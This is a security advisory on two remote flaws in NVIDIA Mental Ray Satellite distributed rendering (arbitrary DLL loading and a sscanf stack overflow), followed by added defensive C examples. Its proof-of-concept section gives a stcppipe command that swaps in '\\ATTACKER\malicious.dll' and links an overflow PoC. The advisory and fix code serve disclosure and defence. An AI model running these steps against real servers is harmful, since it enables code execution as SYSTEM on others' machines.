#######################################################################

Product         NVIDIA Mental Ray Distributed Bucket Rendering
                used in Autodesk software like 3ds Max and Maya
                http://www.nvidia.com/object/nvidia-mental-ray.html
Versions        <= 3.11.1.10
Platforms       Windows, possibly Linux too
Vulnerability   A] arbitrary dll loading
                B] stack-based buffer-overflow
Attack surface  remote
Protocol        custom on port 7517 (Windows 3ds Max)
Date            25 Jan 2013 - found
                10 Dec 2013 - paper released
Author          Luigi Auriemma

#######################################################################


============
Introduction
============


Mental Ray is a rendering engine owned by NVIDIA and used for the
production of high quality movies and animations.

Its Satellite version, used for distributed rendering (render farms),
also ships as a plugin with Autodesk software like 3ds Max, where it is
installed as a SYSTEM service that is started automatically.

On Windows raysat_3dsmax2014_64server.exe listens on TCP port 7517 and
raysat_3dsmax2014_64.exe is spawned for each incoming connection.
Depending on the version the service may also have names like
raysat_3dsmax2013_32server.exe and raysat_3dsmax2013_32.exe, and so on.

Notes:
- SYSTEM service
- DEP and ASLR supported
- a new process is spawned for each connection, which allows endless
  exploitation attempts (a crash in the child does not stop the listener)

#######################################################################


=============
Vulnerability
=============


Please note that these vulnerabilities have been discussed in the
following paper:

  https://revuln.com/files/ReVuln_Nvidia_mental_ray.pdf

This security advisory is only a personal note with information about
how to test the issues.


------------------------
A] Arbitrary dll loading
------------------------

Mental Ray Satellite allows the client to specify the shaders to load for
performing the rendering.
A shader is just a DLL residing on the server. Because the path is
supplied by the client and can be any arbitrary path, including UNC ones
like \\server\folder\file.dll, an attacker can make the remote host load
an arbitrary library, for example one hosted on a share under the
attacker's control.


------------------------------
B] Stack-based buffer-overflow
------------------------------

The first part of the protocol used by the Mental Ray Satellite consists
of a 4-byte signature followed by 7 numbers and a string containing the
version of the remote host.
These parameters are parsed with sscanf; the string is read with a "%s"
conversion that has no field width, and its destination is a small
buffer located on the stack.

The following is a dump from raysat_3dsmax2013_32.exe 3.10.1.4 (the
first argument pushed, [ESP+4C0], is the last sscanf argument, i.e. the
destination of the "%s" conversion, inside the 0x538-byte frame set up
in the prologue):

0040C2C0  /$  55                PUSH EBP                                ; raysat_3dsmax2013_32.0040C2C0(guessed Arg1)
0040C2C1  |.  8BEC              MOV EBP,ESP
0040C2C3  |.  83E4 F8           AND ESP,FFFFFFF8                        ; QWORD (8.-byte) stack alignment
0040C2C6  |.  6A FF             PUSH -1
0040C2C8  |.  68 CDAFE500       PUSH 00E5AFCD                           ; Entry point
0040C2CD  |.  64:A1 00000000    MOV EAX,DWORD PTR FS:[0]
0040C2D3  |.  50                PUSH EAX
0040C2D4  |.  64:8925 00000000  MOV DWORD PTR FS:[0],ESP                ; SE handler
0040C2DB  |.  81EC 38050000     SUB ESP,538
...
0040CAC8  |>  8D9424 C0040000   LEA EDX,[ESP+4C0]
0040CACF  |.  52                PUSH EDX
0040CAD0  |.  8D4424 40         LEA EAX,[ESP+40]
0040CAD4  |.  50                PUSH EAX
0040CAD5  |.  8D4C24 34         LEA ECX,[ESP+34]
0040CAD9  |.  51                PUSH ECX
0040CADA  |.  8B0CBD 60782001   MOV ECX,DWORD PTR DS:[EDI*4+1207860]
0040CAE1  |.  8D5424 44         LEA EDX,[ESP+44]
0040CAE5  |.  52                PUSH EDX
0040CAE6  |.  8D4424 40         LEA EAX,[ESP+40]
0040CAEA  |.  50                PUSH EAX
0040CAEB  |.  83C1 0C           ADD ECX,0C
0040CAEE  |.  51                PUSH ECX
0040CAEF  |.  8D5424 34         LEA EDX,[ESP+34]
0040CAF3  |.  52                PUSH EDX
0040CAF4  |.  8D4424 3C         LEA EAX,[ESP+3C]
0040CAF8  |.  50                PUSH EAX
0040CAF9  |.  8D4C24 64         LEA ECX,[ESP+64]
0040CAFD  |.  68 54FBEB00       PUSH OFFSET 00EBFB54                    ; ASCII "%05d %05d %05d %05d %05d %05d %05d %s"
0040CB02  |.  51                PUSH ECX
0040CB03  |.  FF15 1494EB00     CALL DWORD PTR DS:[<&MSVCR100.sscanf>]

#######################################################################


================
Proof-of-Concept
================


A] A quick example for testing the bug using 3ds Max or other clients;
   the connection will pass through the stcppipe tool, which replaces
   the original DLL name with the new one residing on the attacker's
   computer:

   - download and run the following tool:
     http://aluigi.org/mytoolz/stcppipe.zip

       stcppipe -s "base.dll" "\\ATTACKER\malicious.dll" SERVER 7517 1234

     where SERVER is the hostname or IP of the target and ATTACKER is
     the host reachable via the SMB protocol or WebDAV (your computer).

   - select the following option from the 3ds Max menu:
     Rendering -> Render Setup -> Processing -> Distributed Bucket Rendering

   - activate "Distributed Render"

   - click on "Add" and insert Port 1234 and IP 127.0.0.1

B] http://aluigi.org/poc/raysat_bof.zip

#######################################################################
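The following is an added example, not code from this advisory, from
Mental Ray or from Autodesk. It shows the server-side check that closes
the class of issue described in A]: a shader name received from the
client is accepted only as a bare file name and is resolved inside a
fixed directory on the server, so UNC paths like \\ATTACKER\malicious.dll,
drive-letter paths and traversal elements are rejected before anything
is handed to the loader. The directory C:\shaders, the 64-character
limit, the function names and the sample inputs are assumptions made
for illustration.

```c
/* shader_name_check.c
 *
 * Added example (not part of the advisory or of Mental Ray): accept only a
 * plain "<basename>.dll" from the client and resolve it under a fixed,
 * server-controlled shader directory. Everything below is illustrative;
 * SHADER_DIR and NAME_MAX_LEN are assumed values.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define SHADER_DIR   "C:\\shaders"   /* assumed server-side shader directory */
#define NAME_MAX_LEN 64              /* assumed limit on a shader file name  */

/* Returns 1 if `name` is a bare "<basename>.dll" with no path component,
 * drive letter, stream separator or traversal element, otherwise 0. */
int shader_name_is_safe(const char *name)
{
    if (name == NULL) return 0;
    size_t len = strlen(name);
    if (len < 5 || len > NAME_MAX_LEN) return 0;   /* shortest valid name is "x.dll" */

    /* Reject separators and colons anywhere: this covers "\\host\share\x.dll",
     * "//host/share/x.dll", "C:x.dll" and "x.dll:stream". Only a conservative
     * character set is allowed, so no control bytes or shell metacharacters. */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '\\' || c == '/' || c == ':' || c < 0x20 || c == 0x7f) return 0;
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    if (name[0] == '.') return 0;                    /* rejects ".", "..", ".hidden.dll" */

    /* Must end in ".dll"; Windows file systems are case-insensitive, so
     * compare case-insensitively. */
    const char *ext = name + len - 4;
    for (int i = 0; i < 4; i++)
        if (tolower((unsigned char)ext[i]) != ".dll"[i]) return 0;
    return 1;
}

/* Builds "<SHADER_DIR>\<name>" into `out` only when the name passes the check.
 * Returns 1 on success, 0 if the name is rejected or `out` is too small. */
int resolve_shader_path(const char *name, char *out, size_t outsz)
{
    if (!shader_name_is_safe(name)) return 0;
    int n = snprintf(out, outsz, "%s\\%s", SHADER_DIR, name);
    return n > 0 && (size_t)n < outsz;
}

int main(void)
{
    /* Constructed sample inputs, including the UNC form used in the advisory's PoC. */
    const char *samples[] = {
        "base.dll",
        "\\\\ATTACKER\\malicious.dll",
        "..\\..\\Windows\\System32\\evil.dll",
        "C:\\Windows\\Temp\\evil.dll",
        "shader.DLL",
        "shader.dll:stream",
    };
    char path[260];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-40s -> %s\n", samples[i],
               resolve_shader_path(samples[i], path, sizeof path) ? path : "REJECTED");
    return 0;
}
```

The check is deliberately an allowlist (characters and extension) rather
than a blocklist of known-bad prefixes; a blocklist would have to track
every path syntax the loader accepts (UNC, drive-relative, forward
slashes, device paths), and missing one re-opens the issue.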
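The following is an added example, not code from this advisory and not
Mental Ray's own code. It rebuilds the sscanf pattern visible in the
dump in B] as a small parser and places it next to a bounded version.
The value of the 4-byte signature, the meaning of the 7 numbers and the
real buffer sizes are not stated in the advisory; the signature "XXXX",
the 32-byte version buffer and the 256-byte line buffer used here are
placeholders. The vulnerable function is included for comparison only
and is never called with an over-long string.

```c
/* hello_parse.c
 *
 * Added example (not the advisory's code, not Mental Ray's): the "%s without
 * a field width" sscanf pattern from the dump, next to a bounded parser.
 * SIG_LEN is the only thing the advisory gives (4 bytes); the signature
 * value, field meanings and buffer sizes below are placeholders.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define SIG_LEN       4      /* the advisory says the signature is 4 bytes    */
#define VERSION_MAX   32     /* assumed size of the on-stack version buffer    */
#define VERSION_WIDTH 31     /* must be VERSION_MAX - 1 (room for the NUL)     */
#define HELLO_MAX     256    /* a legitimate hello is far shorter than this    */
#define STR_(x) #x
#define STR(x)  STR_(x)

struct hello {
    int  n[7];
    char version[VERSION_MAX];
};

/* The vulnerable shape: "%s" with no field width. A version token longer than
 * VERSION_MAX-1 bytes runs past h->version; on the real server the destination
 * is a stack buffer, so the overflow heads for the saved frame data.
 * Shown for comparison only; never call it with untrusted input. */
int parse_hello_vulnerable(const char *body, struct hello *h)
{
    return sscanf(body, "%05d %05d %05d %05d %05d %05d %05d %s",
                  &h->n[0], &h->n[1], &h->n[2], &h->n[3], &h->n[4], &h->n[5], &h->n[6],
                  h->version) == 8;
}

/* Bounded version:
 *  - caps the packet and NUL-terminates a private copy (network data is not
 *    a C string, and sscanf needs one);
 *  - gives "%s" a field width one less than the destination size;
 *  - uses "%n" to notice a token that was cut at the width and rejects it
 *    instead of silently truncating.
 * Returns 1 for a well-formed hello, 0 otherwise. */
int parse_hello_safe(const unsigned char *pkt, size_t len, struct hello *h)
{
    char line[HELLO_MAX];
    int consumed = 0;

    if (len < SIG_LEN) return 0;
    pkt += SIG_LEN;                      /* skip the signature (value not checked here) */
    len -= SIG_LEN;
    if (len >= sizeof line) return 0;    /* refuse anything larger than a sane hello */
    memcpy(line, pkt, len);
    line[len] = '\0';

    if (sscanf(line, "%05d %05d %05d %05d %05d %05d %05d %" STR(VERSION_WIDTH) "s%n",
               &h->n[0], &h->n[1], &h->n[2], &h->n[3], &h->n[4], &h->n[5], &h->n[6],
               h->version, &consumed) != 8)
        return 0;
    /* "%31s" stops after 31 bytes; if the byte after it is not the end of the
     * token, the client sent an over-long version string. */
    if (line[consumed] != '\0' && !isspace((unsigned char)line[consumed]))
        return 0;
    return 1;
}

/* Constructs a hello packet for demonstration: placeholder signature, seven
 * zero-padded numbers, then the version string. Returns bytes written, 0 on
 * overflow of `out`. */
size_t build_hello(unsigned char *out, size_t outsz, const char *version)
{
    int n = snprintf((char *)out, outsz, "XXXX%05d %05d %05d %05d %05d %05d %05d %s",
                     1, 2, 3, 4, 5, 6, 7, version);
    return (n < 0 || (size_t)n >= outsz) ? 0 : (size_t)n;
}

int main(void)
{
    unsigned char pkt[HELLO_MAX + 64];
    char longver[80];
    struct hello h;
    size_t n;

    n = build_hello(pkt, sizeof pkt, "3.10.1.4");
    printf("normal hello:    %s\n", parse_hello_safe(pkt, n, &h) ? h.version : "rejected");

    memset(longver, 'A', sizeof longver - 1);   /* 79 x 'A': overflows VERSION_MAX */
    longver[sizeof longver - 1] = '\0';
    n = build_hello(pkt, sizeof pkt, longver);
    printf("79-byte version: %s\n", parse_hello_safe(pkt, n, &h) ? h.version : "rejected");
    return 0;
}
```

Adding only the field width ("%31s") stops the memory corruption but
silently truncates, so a client sending an over-long version would be
accepted with a mangled version string; the "%n" check turns that into a
rejection, which is what a version handshake should do.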